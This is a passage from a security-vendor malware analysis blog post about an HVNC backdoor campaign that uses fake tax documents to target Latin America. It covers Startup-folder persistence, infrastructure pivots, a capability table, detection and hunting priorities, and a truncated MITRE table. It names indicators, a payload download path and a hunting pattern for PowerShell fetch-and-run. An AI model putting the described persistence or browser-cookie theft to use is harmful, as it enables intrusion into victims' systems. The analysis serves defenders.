<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="968" height="852" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream.png" alt="The malware's own check-in banner - captured live via - confirms the HVNC architecture and shows exactly what gets reported to the attacker for every new victim." class="wp-image-23026" style="aspect-ratio:1.1361667054124311;width:436px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream.png 968w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream-300x264.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream-768x676.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream-370x326.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream-270x238.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Network-stream-740x651.png 740w" sizes="auto, (max-width: 968px) 100vw, 968px" /><figcaption class="wp-element-caption"><em>The malware&#8217;s own check-in banner &#8211; captured live via &#8211; confirms the HVNC architecture and shows exactly what gets reported to the attacker for every new victim.</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">We also confirmed the port isn&#8217;t fixed: one build hardcoded 27015, while a separately detonated build connected live on 27017. Treat the port as a per-build configuration value, not a protocol constant &#8211; the VERSION:1.2.0.4.71 string is the more durable fingerprint.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Limit the financial and operational impact of compromise.
</span> 
<br>
Give your SOC the evidence to act before exposure grows.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=hvnc-backdoor-targets-latam&#038;utm_term=080926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Protect Your Operations</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Sticking Around: Persistence via a Fake Update Helper</h2>



<p class="wp-block-paragraph">A follow-up detonation answered the one question static analysis couldn&#8217;t: how does this thing survive a reboot? Watching the process tree in ANY.RUN, UpdateAssistant.exe copies itself &#8211; plus its cover DLLs &#8211; into a second folder under %APPDATA%\Roaming\Programs\Common\, renaming the executable to AppUpdateHelper.exe, then drops a shortcut into the current user&#8217;s Startup folder pointing at that copy.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="713" height="442" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Classic-Startup-folder-persistence-MITRE-T1547.001.png" alt="Classic Startup-folder persistence (MITRE T1547.001), layered with a self-rename step that matches the malware's mutex-naming convention." class="wp-image-23027" style="width:605px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Classic-Startup-folder-persistence-MITRE-T1547.001.png 713w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Classic-Startup-folder-persistence-MITRE-T1547.001-300x186.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Classic-Startup-folder-persistence-MITRE-T1547.001-370x229.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Classic-Startup-folder-persistence-MITRE-T1547.001-270x167.png 270w" sizes="auto, (max-width: 713px) 100vw, 713px" /><figcaption class="wp-element-caption"><em>Classic Startup-folder persistence (MITRE T1547.001), layered with a self-rename step that matches the malware&#8217;s mutex-naming convention</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">That name isn&#8217;t a coincidence: earlier pivoting in ANY.RUN&#8217;s Threat Intelligence Lookup on the C2 IP had already surfaced runtime mutex values from unrelated prior submissions &#8211; Global\AppUpdateHelper_E7A2F and Global\WinSvc_4CF8B2E6 &#8211; from builds spanning back to March 2026. The prefix is stable across builds; only the suffix changes. Interestingly, we also caught this malware executing its own browser-redirect command in the wild: several TI Lookup events show msedge.exe &#8211;type=util&#8230; launched in direct correlation with a connection to the C2 IP, matching the capability we&#8217;d already decoded statically.</p>



<h2 class="wp-block-heading">Following the Infrastructure Trail</h2>



<p class="wp-block-paragraph">The LNK&#8217;s embedded builder hostname &#8211; servee &#8211; turned into a live pivot. Querying Shodan for the staging IP (an Azure VM used only to host the second-stage download) showed an exposed RPC endpoint mapper leaking that exact NetBIOS name, confirming the builder machine and the delivery host are one and the same.</p>



<p class="wp-block-paragraph">The live C2, by contrast, sits on a GHOSTnet GmbH VPS in Frankfurt &#8211; a different provider entirely, reflecting a deliberate split between disposable staging infrastructure and a stable, actively-managed C2 host (Shodan even shows a self-signed AnyDesk certificate on the box, suggesting the operator manages it remotely).</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="495" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-1024x495.png" alt="Passive infrastructure fingerprinting via Shodan tied the malware's build environment directly to its live delivery server.
" class="wp-image-23028" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-1024x495.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-300x145.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-768x371.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-1536x743.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-370x179.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-270x131.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan-740x358.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Passive-infrastructure-fingerprinting-via-Shodan.png 1636w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Passive infrastructure fingerprinting via Shodan tied the malware&#8217;s build environment directly to its live delivery server.</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Pivoting further in TI Lookup on the same C2 IP surfaced several more findings worth flagging. First, the same server also hosts other stage-2 payloads under different lure themes (dl.php?f=cresol.exe&amp;k=chave_tecl_cresol — a Sicredi/Cresol-branded variant), confirming this is a reusable kit, not a one-off. Related activity also showed the same NFe lure theme being delivered through ClickFix-style prompts, suggesting the operators can rotate delivery methods as well as infrastructure and payloads. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="755" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-1024x755.png" alt="A single infrastructure pivot in TI Lookup connected this sample to at least two other lure themes and a completely separate banking-phishing cluster." class="wp-image-23029" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-1024x755.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-300x221.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-768x566.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-1536x1133.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-370x273.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-270x199.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-740x546.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1-80x60.png 80w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1.png 1665w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A single infrastructure pivot in TI Lookup connected this sample to at least two other lure themes and a completely separate banking-phishing cluster</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">A related domain — gerenciadorcaixa.digital, cloning Caixa Econômica Federal’s corporate banking portal — shares the same gerenciador[bank].digital naming convention as a Banco do Brasil phishing clone found on a sibling IP, suggesting either a shared operator or hosting reseller behind multiple financial-phishing campaigns.</p>



<h2 class="wp-block-heading">Capability Summary</h2>



<p class="wp-block-paragraph">The final payload combines remote-control, data-theft, evasion, and persistence capabilities in a single backdoor. The table below summarizes the behaviors confirmed during static and dynamic analysis, along with the confidence level for each finding.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-373"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="11"
           data-wpID="373"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Capability                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Confidence                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Evidence                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Hidden virtual desktop / HVNC remote control                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CreateDesktopA/OpenDesktopA/SetThreadDesktop imports + producer/consumer thread architecture (Section 8.2.4)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Screen capture                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        GDI BitBlt/GetDIBits imports + OpenCV cv::Mat queue in sub_14000E540                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Simulated mouse/keyboard input (remote control)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        SendInput/PostMessageA/SendMessageA imports                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Keystroke monitoring                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Medium-High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        GetAsyncKeyState/GetKeyboardState imports (YARA KeyloggerApi); active polling loop not fully traced                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Firefox cookie / history / permission theft                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Hardcoded cookies.sqlite / places.sqlite / permissions.sqlitestrings                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Chromium credential-store theft                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Unconfirmed                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        No “Login Data”/“Web Data” plaintext strings found; possible dynamic resolution not yet decoded                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        AV/EDR discovery (non-destructive)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        20+ hardcoded AV process names + low-priority evasion behavior                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Operator-directed browser redirection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        sub_140019CA0, fully decoded (Section 8.4)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Raw-TCP custom C2 protocol (self-identified as “HVNC”, port 27015/27017 per build)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        High                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Fully decoded C2 host/socket configuration (Section 8.2.3) plus a captured plaintext handshake naming the protocol itself and transmitting a full victim fingerprint (Section 10.2)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence mechanism                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        High - Confirmed                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Startup-folder shortcut (T1547.001) pointing to a self-relocated, renamed copy (AppUpdateHelper.exe) in %APPDATA%\Roaming\Programs\Common\; confirmed dynamically via ANY.RUN (Section 8.5.3)                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-373'>
table#wpdtSimpleTable-373{ table-layout: fixed !important; }
table#wpdtSimpleTable-373 td, table.wpdtSimpleTable373 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">Detection and Hunting Priorities</h2>



<p class="wp-block-paragraph">Because payload hashes and infrastructure can change between builds, detection should combine campaign-specific IOCs with more durable behavioral signals.</p>



<ul class="wp-block-list">
<li><strong>Watch for suspicious PowerShell execution:</strong> Flag hidden PowerShell launched from .lnk files, especially commands combining Invoke-WebRequest and Start-Process.</li>



<li><strong>Check fake update binaries:</strong> Investigate unsigned processes named UpdateAssistant.exe or similar Windows Update-themed files running outside legitimate Windows directories.</li>



<li><strong>Hunt for HVNC behavior:</strong> Look for unsigned processes combining hidden-desktop APIs, screen capture, and simulated keyboard or mouse input.</li>



<li><strong>Monitor persistence:</strong> Alert on unusual .lnk files written to the Startup folder, particularly when they point to executables under %APPDATA%.</li>



<li><strong>Use durable network indicators:</strong> Hunt for the HVNC- protocol strings, VERSION:1.2.0.4.71, and the nfe_valid_access_key delivery token rather than relying only on current C2 IPs or ports.</li>
</ul>



<h2 class="wp-block-heading">How Organizations Can Reduce the Risk from HVNC Campaigns</h2>



<p class="wp-block-paragraph">Security awareness should reflect these workflows, especially for finance, accounting, procurement, and other document-heavy teams. Employees should know how to verify unexpected files or signing requests before opening them.</p>



<h3 class="wp-block-heading"><strong>Treat Tax and Business Documents as a High-Risk Entry Point</strong></h3>



<p class="wp-block-paragraph">Organizations handling large volumes of tax documents, invoices, signing requests, and other financial communications should treat unexpected downloads and attachments with extra scrutiny.</p>



<p class="wp-block-paragraph">Security awareness should focus on the specific workflows attackers imitate, not phishing in general. Employees working in finance, accounting, procurement, and other document-heavy functions are especially important here.</p>



<h3 class="wp-block-heading"><strong>Analyze Suspicious Files Before They Reach Production Systems</strong></h3>



<p class="wp-block-paragraph">The campaign relies on several seemingly ordinary stages — a ZIP archive, an .lnk shortcut, PowerShell, and an installer — before the HVNC payload appears. </p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" width="508" height="619" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-network-capture.png" alt="ANY.RUN sandbox network capture - C2 beacon to the Source-engine " class="wp-image-23031" style="width:410px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-network-capture.png 508w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-network-capture-246x300.png 246w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-network-capture-370x451.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ANY.RUN-sandbox-network-capture-270x329.png 270w" sizes="auto, (max-width: 508px) 100vw, 508px" /><figcaption class="wp-element-caption"><em>ANY.RUN sandbox network capture &#8211; C2 beacon to the Source-engine </em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Suspicious files and URLs can be opened in an isolated environment such as <strong>ANY.RUN&#8217;s <a href="https://any.run/features/?utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a></strong> to expose the full execution chain, including hidden PowerShell activity, dropped files, network connections, persistence, and C2 behavior before an analyst makes a containment decision.</p>



<h3 class="wp-block-heading"><strong>Expand Investigations Beyond the First IOC</strong></h3>



<p class="wp-block-paragraph">One malicious IP or file may represent only a small part of the campaign.</p>



<p class="wp-block-paragraph">Using <strong>ANY.RUN&#8217;s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a></strong>, teams can pivot from an IP, domain, URL, mutex, or other indicator to related samples and infrastructure. In this investigation, those pivots exposed additional lure themes and connected activity beyond the original sample. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-1024x586.png" alt="ANY.RUN TI Lookup - Analyses tab showing related submissions across the campaign timeline 
" class="wp-image-23032" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-270x154.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-analysis-sessions-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN TI Lookup &#8211; Analyses tab showing related submissions across the campaign timeline</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">For security leaders, this means fewer incidents treated in isolation and a better chance of identifying the wider campaign before another endpoint is affected.</p>



<h3 class="wp-block-heading"><strong>Push Fresh Threat Intelligence Into Existing Controls</strong></h3>



<p class="wp-block-paragraph">Because payload hashes and infrastructure can change between builds, organizations should avoid relying only on static blocklists. The investigation already showed different payload hashes across builds while more durable behavioral and protocol indicators remained consistent. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="422" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1024x422.png" alt="TI feeds" class="wp-image-22925" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1024x422.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-300x124.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-768x317.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1536x634.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-370x153.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-270x111.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-740x305.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1.png 1583w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds provide SOC teams with fresh, actionable IOCs</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a></strong> can help distribute current malicious infrastructure and indicators into SIEM, EDR, firewalls, and other existing security controls, while behavioral detections provide coverage when individual IPs, domains, or payloads rotate.</p>



<h3 class="wp-block-heading"><strong>Plan for Full Containment, Not Just Initial Cleanup</strong></h3>



<p class="wp-block-paragraph">Once HVNC is installed, removing the original file is not enough. The malware establishes persistence, maintains C2 access, and can continue operating after reboot. </p>



<p class="wp-block-paragraph">Incident-response plans should therefore include checking persistence mechanisms, terminating malicious processes, blocking C2 activity, reviewing exposed credentials and browser sessions, and confirming that attacker access has been fully removed.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn deeper threat visibility into lower MTTD and MTTR.
</span> 
<br>
Shorten the path from threat discovery to business protection.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=hvnc-backdoor-targets-latam&#038;utm_term=080926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen SOC Performance </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">This HVNC campaign shows how familiar business workflows can be turned into an effective path to persistent compromise. Fake tax documents and trusted-brand lures ultimately lead to a backdoor capable of hidden remote control, keystroke monitoring, browser-data theft, and long-term access. </p>



<p class="wp-block-paragraph">For organizations across Latin America, the key lesson is to look beyond the initial phishing artifact and detect the behaviors and infrastructure that remain consistent as campaigns evolve:</p>



<ul class="wp-block-list">
<li><strong>Simple delivery can lead to high-impact compromise:</strong> A phishing page, shortcut file, and installer ultimately provide attackers with a capable HVNC backdoor.</li>



<li><strong>Persistence increases the window of exposure:</strong> The malware can maintain access through a Startup-folder mechanism even after a reboot. </li>



<li><strong>Static IOCs are not enough:</strong> Payload hashes change between builds, making behavioral and protocol-based detection more reliable over time. </li>



<li><strong>C2 behavior provides durable detection opportunities:</strong> The malware exposes distinctive protocol strings and sends victim and AV information during check-in, giving defenders stronger hunting signals than IPs alone. </li>



<li><strong>Threat intelligence helps reveal the wider campaign:</strong> Pivoting from individual indicators exposed related lure themes, infrastructure, and financially motivated phishing activity beyond the original sample. </li>
</ul>



<h2 class="wp-block-heading">About ANY.RUN</h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> is a leading provider of interactive malware analysis and threat intelligence solutions trusted by more than <strong>16,000 organizations worldwide</strong>, including <strong>74% of the Fortune 100</strong>.</p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=hvnc-backdoor-targets-latam&amp;utm_term=080926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence</strong></a> solutions help SOC teams analyze suspicious files and URLs, uncover malicious behavior, enrich investigations with actionable context, and connect related activity across infrastructure and campaigns.</p>



<p class="wp-block-paragraph">This helps security teams <strong>reduce investigation time, lower MTTD and MTTR, and contain threats before business impact grows.</strong></p>



<h2 class="wp-block-heading">MITRE ATT&amp;CK Mapping</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-375"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="20"
           data-wpID="375"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Tactic                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Technique ID                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Technique Name                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Evidence                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
